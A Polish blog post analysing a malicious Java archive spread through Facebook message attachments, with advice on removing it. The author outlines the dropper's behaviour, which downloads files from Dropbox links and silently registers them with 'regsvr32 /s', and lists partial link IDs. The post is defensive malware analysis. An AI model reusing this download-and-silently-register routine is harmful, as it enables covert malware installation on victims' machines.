Archiwum

Posts Tagged ‘IMG_0018’

Złośliwa paczka z FB: IMG_0018.jar

Maj 28, 2014 Dodaj komentarz

Dostałem ostatnio wraz z wiadomością prosty, złośliwy programem. Dotarł on do mnie jako załącznik w poniższej postaci.

fb1

W zipie znajdował się pojedynczy plik jar o słodko brzmiącej nazwie IMG_0018, a w nim jedna klasa  i meta-dane. Prawda, że wygląda niewinnie? 🙂

fb2

Działanie programu
Z ciekawości sprawdziłem co robił program, poniżej zapisane jest jego zachowanie. Jak łatwo zauważyć paczka miała za zadanie ściągać z dropboxa i po cichu rejestrować w systemie złośliwe dllki.

create new dir "C:\Temp\"
create new file "C:\Temp\TIWIWSLN.ADZ"

if file „C:\Temp\TIWIWSLN.ADZ” exists
–> 15x run: regsvr32 /s C:\Temp\TIWIWSLN.ADZ

if file „C:\Temp\TIWIWSLN.ADZ” not exist
–> connect to URL: [dropbox]/s/xnf57eni8dpd547/folder.zip?dl=1
–> if connect response code == 200
—-> copy file from [dropbox]/s/xnf57eni8dpd547/folder.zip?dl=1 to C:\Temp\TIWIWSLN.ADZ
—-> 15x run: regsvr32 /s C:\Temp\TIWIWSLN.ADZ
–> repeat for: nwju1443do0kkyw, q7qn5enz2han406, jklutosvow2sa28, nl51ieactma87q0, mxflfforve2ju65, pf5yxvq1wmjcun2, …

Pliki z dropboxa nie są już dostępne, więc nie jestem w stanie stwierdzić co dokładnie zawierały, ale nie spodziewałbym się niczego dobrego.

Uruchomiłem program, co teraz?
Jeśli ktoś przypadkiem ściągnął i uruchomił program radzę wylogować z Facebooka, przez którego najwyraźniej rozprzestrzenia się paczka. Kolejnym krokiem powinno być usunięcie niepożądanych dll-ek.

START -> cmd
regsvr32 /u C:\Temp\TIWIWSLN.ADZ

Jeśli powyższa komenda nie zadziała spróbujcie skorzystać z dowolnego programu do usuwania niepożądanego oprogramowania (np. AdwCleaner). Na końcu należy oczywiście usunąć folder C:\Temp\TIWIWSLN.ADZ wraz z zawartością.

Trudno powiedzieć czy to wystarczy, dlatego polecam przeskanowanie całego systemu programem antywirusowym i antymalware-owym.

PS
Jeśli macie jakieś dodatkowe informacje o tym programie piszcie śmiało, a uzupełnię instrukcję.

Aktualizacje
Okazało się, że nowe linki z dropboxa, są generowane dynamicznie. Dorwałem się więc w końcu do tej nieszczęsnej dllki i nawet udało mi się ją zdeasemblować (PE-Explorer), ale na przeglądanie tak niskopoziomowego kodu nie mam czasu. Jakby ktoś był ciekaw to mogę podesłać.

O problemie pisze już niebezpiecznik: „Hahaha wirus na Facebooku — nie otwierajcie załączników ZIP z wiadomości od znajomych”